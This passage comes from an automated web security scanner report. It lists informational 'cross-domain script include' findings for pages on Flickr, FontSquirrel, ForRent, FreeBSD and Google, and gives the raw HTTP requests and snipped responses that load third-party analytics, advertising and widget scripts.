"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.2.tbz/ - Package Browser</
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.1068. http://www.flickr.com/photos/aubalumni/4688630122/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /photos/aubalumni/4688630122/x22

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://l.yimg.com/g/javascript/fold_main.js.v48851.48851.48851.48851.48851.38771.48851.48851.99272.84182.86949.86949.62864.38771.66362.84183.84152.69832.38771.84694.38771.88197.84182.98826.98920.99014.17
  • http://l.yimg.com/g/javascript/global.js.v93276.17
  • http://l.yimg.com/g/javascript/s_output_en-us.js.e02f3c9e0daa4639d1f9c385d44d3918
  • http://us.adserver.yahoo.com/a?f=792600122&p=flickr&l=FOOT9&c=r

Request

GET /photos/aubalumni/4688630122/x22 HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 24 Jan 2011 16:16:26 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: BX=cvj761d6jr9eq&b=3&s=q9; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Thu, 23-Jan-2014 16:16:26 GMT; path=/; domain=.flickr.com
Set-Cookie: cookie_l10n=deleted; expires=Sun, 24-Jan-2010 16:16:25 GMT; path=/; domain=flickr.com
Set-Cookie: cookie_intl=deleted; expires=Sun, 24-Jan-2010 16:16:25 GMT; path=/; domain=flickr.com
X-Served-By: www121.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html lang="en-us">
<head>
   <title>Flickr: Page Not Found</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

...[SNIP]...
</script>
<script type="text/javascript" src="http://l.yimg.com/g/javascript/global.js.v93276.17"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://l.yimg.com/g/javascript/fold_main.js.v48851.48851.48851.48851.48851.38771.48851.48851.99272.84182.86949.86949.62864.38771.66362.84183.84152.69832.38771.84694.38771.88197.84182.98826.98920.99014.17"></script>

<script type="text/javascript" src="http://l.yimg.com/g/javascript/s_output_en-us.js.e02f3c9e0daa4639d1f9c385d44d3918"></script>
...[SNIP]...
</div>


   <script src="http://us.adserver.yahoo.com/a?f=792600122&p=flickr&l=FOOT9&c=r"></script>
...[SNIP]...

21.1069. http://www.flickr.com/photos/favoritltd/4795390303/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /photos/favoritltd/4795390303/

Issue detail

The response dynamically includes the following script from another domain:
  • http://l.yimg.com/g/combo/1/3.3.0?j/.GD/3.3.0/.GD/.GD-.E.A.vSKm6&j/.GD/3.3.0/.FN/.FN-.E.A.vSKm6

Request

GET /photos/favoritltd/4795390303/ HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BX=e88ol6d6i4psk&b=3&s=vs; localization=en-us%3Bus%3Bus;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:12:12 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Fri, 24-Jan-2014 13:12:12 GMT; path=/; domain=.flickr.com
Set-Cookie: cookie_l10n=deleted; expires=Mon, 25-Jan-2010 13:12:11 GMT; path=/; domain=flickr.com
Set-Cookie: cookie_intl=deleted; expires=Mon, 25-Jan-2010 13:12:11 GMT; path=/; domain=flickr.com
Set-Cookie: fldetectedlang=en-us; expires=Sat, 26-Mar-2011 13:12:12 GMT; path=/; domain=.flickr.com
X-Served-By: www53.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 89342

<!DOCTYPE html>
<html xmlns:dc="http://purl.org/dc/terms/" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:cc="http://creativecommons.org/ns#" lang="en-us">
<head>

   <title>2010-02-23 18.36.45 | Flickr
...[SNIP]...
</div>


           <script src="http://l.yimg.com/g/combo/1/3.3.0?j/.GD/3.3.0/.GD/.GD-.E.A.vSKm6&amp;j/.GD/3.3.0/.FN/.FN-.E.A.vSKm6"></script>
...[SNIP]...

21.1070. http://www.flickr.com/photos/favoritltd/4795390991/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /photos/favoritltd/4795390991/

Issue detail

The response dynamically includes the following script from another domain:
  • http://l.yimg.com/g/combo/1/3.3.0?j/.GD/3.3.0/.GD/.GD-.E.A.vSKm6&j/.GD/3.3.0/.FN/.FN-.E.A.vSKm6

Request

GET /photos/favoritltd/4795390991/ HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BX=e88ol6d6i4psk&b=3&s=vs; localization=en-us%3Bus%3Bus;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:12:10 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Fri, 24-Jan-2014 13:12:10 GMT; path=/; domain=.flickr.com
Set-Cookie: cookie_l10n=deleted; expires=Mon, 25-Jan-2010 13:12:09 GMT; path=/; domain=flickr.com
Set-Cookie: cookie_intl=deleted; expires=Mon, 25-Jan-2010 13:12:09 GMT; path=/; domain=flickr.com
Set-Cookie: fldetectedlang=en-us; expires=Sat, 26-Mar-2011 13:12:11 GMT; path=/; domain=.flickr.com
X-Served-By: www57.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 88056

<!DOCTYPE html>
<html xmlns:dc="http://purl.org/dc/terms/" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:cc="http://creativecommons.org/ns#" lang="en-us">
<head>

   <title>2010-05-21 14.19.55 | Flickr
...[SNIP]...
</div>


           <script src="http://l.yimg.com/g/combo/1/3.3.0?j/.GD/3.3.0/.GD/.GD-.E.A.vSKm6&amp;j/.GD/3.3.0/.FN/.FN-.E.A.vSKm6"></script>
...[SNIP]...

21.1071. http://www.flickr.com/photos/favoritltd/4795392149/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /photos/favoritltd/4795392149/

Issue detail

The response dynamically includes the following script from another domain:
  • http://l.yimg.com/g/combo/1/3.3.0?j/.GD/3.3.0/.GD/.GD-.E.A.vSKm6&j/.GD/3.3.0/.FN/.FN-.E.A.vSKm6

Request

GET /photos/favoritltd/4795392149/ HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BX=e88ol6d6i4psk&b=3&s=vs; localization=en-us%3Bus%3Bus;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:11:48 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Fri, 24-Jan-2014 13:11:48 GMT; path=/; domain=.flickr.com
Set-Cookie: cookie_l10n=deleted; expires=Mon, 25-Jan-2010 13:11:47 GMT; path=/; domain=flickr.com
Set-Cookie: cookie_intl=deleted; expires=Mon, 25-Jan-2010 13:11:47 GMT; path=/; domain=flickr.com
Set-Cookie: fldetectedlang=en-us; expires=Sat, 26-Mar-2011 13:11:48 GMT; path=/; domain=.flickr.com
X-Served-By: www88.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 86022

<!DOCTYPE html>
<html xmlns:dc="http://purl.org/dc/terms/" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:cc="http://creativecommons.org/ns#" lang="en-us">
<head>

   <title>2010-03-05 17.55.24 | Flickr
...[SNIP]...
</div>


           <script src="http://l.yimg.com/g/combo/1/3.3.0?j/.GD/3.3.0/.GD/.GD-.E.A.vSKm6&amp;j/.GD/3.3.0/.FN/.FN-.E.A.vSKm6"></script>
...[SNIP]...

21.1072. http://www.flickr.com/photos/favoritltd/4795392811/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /photos/favoritltd/4795392811/

Issue detail

The response dynamically includes the following script from another domain:
  • http://l.yimg.com/g/combo/1/3.3.0?j/.GD/3.3.0/.GD/.GD-.E.A.vSKm6&j/.GD/3.3.0/.FN/.FN-.E.A.vSKm6

Request

GET /photos/favoritltd/4795392811/ HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BX=e88ol6d6i4psk&b=3&s=vs; localization=en-us%3Bus%3Bus;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:11:45 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Fri, 24-Jan-2014 13:11:45 GMT; path=/; domain=.flickr.com
Set-Cookie: cookie_l10n=deleted; expires=Mon, 25-Jan-2010 13:11:44 GMT; path=/; domain=flickr.com
Set-Cookie: cookie_intl=deleted; expires=Mon, 25-Jan-2010 13:11:44 GMT; path=/; domain=flickr.com
Set-Cookie: fldetectedlang=en-us; expires=Sat, 26-Mar-2011 13:11:45 GMT; path=/; domain=.flickr.com
X-Served-By: www30.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 83646

<!DOCTYPE html>
<html xmlns:dc="http://purl.org/dc/terms/" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:cc="http://creativecommons.org/ns#" lang="en-us">
<head>

   <title>2010-04-13 10.18.02 | Flickr
...[SNIP]...
</div>


           <script src="http://l.yimg.com/g/combo/1/3.3.0?j/.GD/3.3.0/.GD/.GD-.E.A.vSKm6&amp;j/.GD/3.3.0/.FN/.FN-.E.A.vSKm6"></script>
...[SNIP]...

21.1073. http://www.flickr.com/photos/favoritltd/4796022554/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /photos/favoritltd/4796022554/

Issue detail

The response dynamically includes the following script from another domain:
  • http://l.yimg.com/g/combo/1/3.3.0?j/.GD/3.3.0/.GD/.GD-.E.A.vSKm6&j/.GD/3.3.0/.FN/.FN-.E.A.vSKm6

Request

GET /photos/favoritltd/4796022554/ HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BX=e88ol6d6i4psk&b=3&s=vs; localization=en-us%3Bus%3Bus;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:12:29 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Fri, 24-Jan-2014 13:12:29 GMT; path=/; domain=.flickr.com
Set-Cookie: cookie_l10n=deleted; expires=Mon, 25-Jan-2010 13:12:28 GMT; path=/; domain=flickr.com
Set-Cookie: cookie_intl=deleted; expires=Mon, 25-Jan-2010 13:12:28 GMT; path=/; domain=flickr.com
Set-Cookie: fldetectedlang=en-us; expires=Sat, 26-Mar-2011 13:12:29 GMT; path=/; domain=.flickr.com
X-Served-By: www29.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 88059

<!DOCTYPE html>
<html xmlns:dc="http://purl.org/dc/terms/" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:cc="http://creativecommons.org/ns#" lang="en-us">
<head>

   <title>2010-03-29 14.38.40 | Flickr
...[SNIP]...
</div>


           <script src="http://l.yimg.com/g/combo/1/3.3.0?j/.GD/3.3.0/.GD/.GD-.E.A.vSKm6&amp;j/.GD/3.3.0/.FN/.FN-.E.A.vSKm6"></script>
...[SNIP]...

21.1074. http://www.flickr.com/photos/favoritltd/4796024690/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /photos/favoritltd/4796024690/

Issue detail

The response dynamically includes the following script from another domain:
  • http://l.yimg.com/g/combo/1/3.3.0?j/.GD/3.3.0/.GD/.GD-.E.A.vSKm6&j/.GD/3.3.0/.FN/.FN-.E.A.vSKm6

Request

GET /photos/favoritltd/4796024690/ HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BX=e88ol6d6i4psk&b=3&s=vs; localization=en-us%3Bus%3Bus;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:11:55 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Fri, 24-Jan-2014 13:11:55 GMT; path=/; domain=.flickr.com
Set-Cookie: cookie_l10n=deleted; expires=Mon, 25-Jan-2010 13:11:54 GMT; path=/; domain=flickr.com
Set-Cookie: cookie_intl=deleted; expires=Mon, 25-Jan-2010 13:11:54 GMT; path=/; domain=flickr.com
Set-Cookie: fldetectedlang=en-us; expires=Sat, 26-Mar-2011 13:11:55 GMT; path=/; domain=.flickr.com
X-Served-By: www65.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 88059

<!DOCTYPE html>
<html xmlns:dc="http://purl.org/dc/terms/" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:cc="http://creativecommons.org/ns#" lang="en-us">
<head>

   <title>2010-04-13 10.21.19 | Flickr
...[SNIP]...
</div>


           <script src="http://l.yimg.com/g/combo/1/3.3.0?j/.GD/3.3.0/.GD/.GD-.E.A.vSKm6&amp;j/.GD/3.3.0/.FN/.FN-.E.A.vSKm6"></script>
...[SNIP]...

21.1075. http://www.fontsquirrel.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fontsquirrel.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://s7.addthis.com/js/152/addthis_widget.js

Request

GET / HTTP/1.1
Host: www.fontsquirrel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:16:26 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a mod_bwlimited/1.4 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 20353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<!--
   w
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...

21.1076. http://www.forrent.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.forrent.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://s7.addthis.com/js/250/addthis_widget.js?pub=forrent
  • http://sftrack.searchforce.net/SFConversionTracking/CTCommon.js
  • http://video.bettervideo.com/videos/player/ForRent/mds.js

Request

GET / HTTP/1.1
Host: www.forrent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:02:36 GMT
Server: Apache
Set-Cookie: PHPSESSID=8ct7fdk873duftnhmjoh7oems5; path=/, test_element_id=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: test_element_id=0; expires=Mon, 25-Apr-2011 00:02:36 GMT; path=/
X-Server-Id: W2
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 52497

   
<!doctype html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head dir="ltr" lang="en-us" profile="http://purl.org/uF/2008/03/ http://purl.org/uF/hCard/1.0/ http://gmpg.org/xfn/11">
   <meta http-equi
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?pub=forrent"></script>
...[SNIP]...
<div id="playerNode" class="homeVideo balance" onmousedown="javascript: if (playerWasClicked == false) { write_event('CommunitySpotlight_Click',14,'commspot'); playerWasClicked = true;}">
                   <script src="http://video.bettervideo.com/videos/player/ForRent/mds.js" clientId="7" videoId="loc1297009577" locationId="0" config="page_type_id=mainMap&siteID=loc1297009577"></script>
...[SNIP]...
<!-- 2.0 -->
<script type="text/javascript" language="Javascript" src="http://sftrack.searchforce.net/SFConversionTracking/CTCommon.js"></script>
...[SNIP]...

21.1077. http://www.freebsd.org/community.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /community.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://www.google.com/uds/api?file=uds.js&v=1.0&source=uds-vbw
  • http://www.google.com/uds/solutions/videobar/gsvideobar.js?mode=new

Request

GET /community.html HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "3339736707"
Last-Modified: Sun, 02 Jan 2011 00:10:42 GMT
Content-Length: 8631
Connection: close
Date: Mon, 24 Jan 2011 16:39:35 GMT
Server: httpd/1.4.x LaHonda

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:cvs="http://www.Fr
...[SNIP]...
</div>

<script src="http://www.google.com/uds/api?file=uds.js&amp;v=1.0&amp;source=uds-vbw"
type="text/javascript">

</script>
...[SNIP]...
</script>

<script src="http://www.google.com/uds/solutions/videobar/gsvideobar.js?mode=new"
type="text/javascript">

</script>
...[SNIP]...

21.1078. http://www.freebsdfoundation.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsdfoundation.org
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.statcounter.com/counter/counter.js

Request

GET / HTTP/1.1
Host: www.freebsdfoundation.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:39:39 GMT
Server: Apache/2.2.15 (FreeBSD) mod_ssl/2.2.15 OpenSSL/0.9.8n DAV/2
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Length: 12801

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-
...[SNIP]...
</script>

<script type="text/javascript"
src="http://www.statcounter.com/counter/counter.js">
</script>
...[SNIP]...

21.1079. http://www.google.com/intl/en/options/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /intl/en/options/

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google-analytics.com/ga.js

Request

GET /intl/en/options/ HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Sun, 02 Jan 2011 19:40:45 GMT
Date: Mon, 24 Jan 2011 16:39:53 GMT
Expires: Mon, 24 Jan 2011 16:39:53 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Connection: close

...<!DOCTYPE html>
<html lang="en">
<meta charset="utf-8">
<base href="http://www.google.com">
<title>More Google Products</title>
<link rel="stylesheet" href="/options/default.css">

<div id="id">

<
...[SNIP]...
</div>

<script src="//www.google-analytics.com/ga.js"></script>
...[SNIP]...

21.1080. http://www.google.com/support/chrome/bin/answer.py

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /support/chrome/bin/answer.py

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google-analytics.com/ga.js

Request

GET /support/chrome/bin/answer.py?answer=95671&hl=en HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
Set-Cookie: N_T=sess%3D1048c45e2d599fb4%26v%3D2%26c%3De93dbe18%26s%3D4d3e1337%26t%3DA%3A0%3A95671%26sessref%3D; Expires=Tue, 25-Jan-2011 00:33:04 GMT; Path=/support; HttpOnly
Content-Type: text/html; charset=UTF-8
Date: Tue, 25 Jan 2011 00:03:04 GMT
Expires: Tue, 25 Jan 2011 00:03:04 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<script type="text/javascript">serverResponseTimeDelta=window.external&&window.extern
...[SNIP]...
</script>
<script src='//www.google-analytics.com/ga.js'
type='text/javascript'>
</script>
...[SNIP]...

21.1081. http://www.google.com/support/websearch/bin/answer.py

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /support/websearch/bin/answer.py

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google-analytics.com/ga.js

Request

GET /support/websearch/bin/answer.py?answer=186645&hl=en&form=bb HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
Set-Cookie: N_T=sess%3Db05508fc5fd1fa4%26v%3D2%26c%3D59402611%26s%3D4d3dab57%26t%3DA%3A0%3A186645%26sessref%3D; Expires=Mon, 24-Jan-2011 17:09:52 GMT; Path=/support; HttpOnly
Content-Type: text/html; charset=UTF-8
Date: Mon, 24 Jan 2011 16:39:52 GMT
Expires: Mon, 24 Jan 2011 16:39:52 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<script type="text/javascript">serverResponseTimeDelta=window.external&&window.extern
...[SNIP]...
</script>
<script src='//www.google-analytics.com/ga.js'
type='text/javascript'>
</script>
...[SNIP]...

21.1082. https://www.google.com/adsense/support/bin/request.py

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.google.com
Path:   /adsense/support/bin/request.py

Issue detail

The response dynamically includes the following script from another domain:
  • https://ssl.google-analytics.com/ga.js

Request

GET /adsense/support/bin/request.py HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
Set-Cookie: N_T=sess%3D756ba543b06cbd01%26v%3D2%26c%3D8bbbe1ed%26s%3D4d3eccb4%26t%3DR%3A1%3A%26sessref%3D; Expires=Tue, 25-Jan-2011 13:44:29 GMT; Path=/adsense/support; Secure; HttpOnly
Content-Type: text/html; charset=UTF-8
Date: Tue, 25 Jan 2011 13:14:29 GMT
Expires: Tue, 25 Jan 2011 13:14:29 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<script type="text/javascript">serverResponseTimeDelta=window.external&&window.extern
...[SNIP]...
</script>
<script src='//ssl.google-analytics.com/ga.js'
type='text/javascript'>
</script>
...[SNIP]...

21.1083. http://www.goozernation.com/video-games/index.php/news/351-video-games-qcreate-mental-health-problemsq

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.goozernation.com
Path:   /video-games/index.php/news/351-video-games-qcreate-mental-health-problemsq

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://w.sharethis.com/button/sharethis.js
  • http://widgets.twimg.com/j/2/widget.js
  • http://www.assoc-amazon.com/s/link-enhancer?tag=goozer-20&o=1

Request

GET /video-games/index.php/news/351-video-games-qcreate-mental-health-problemsq HTTP/1.1
Host: www.goozernation.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

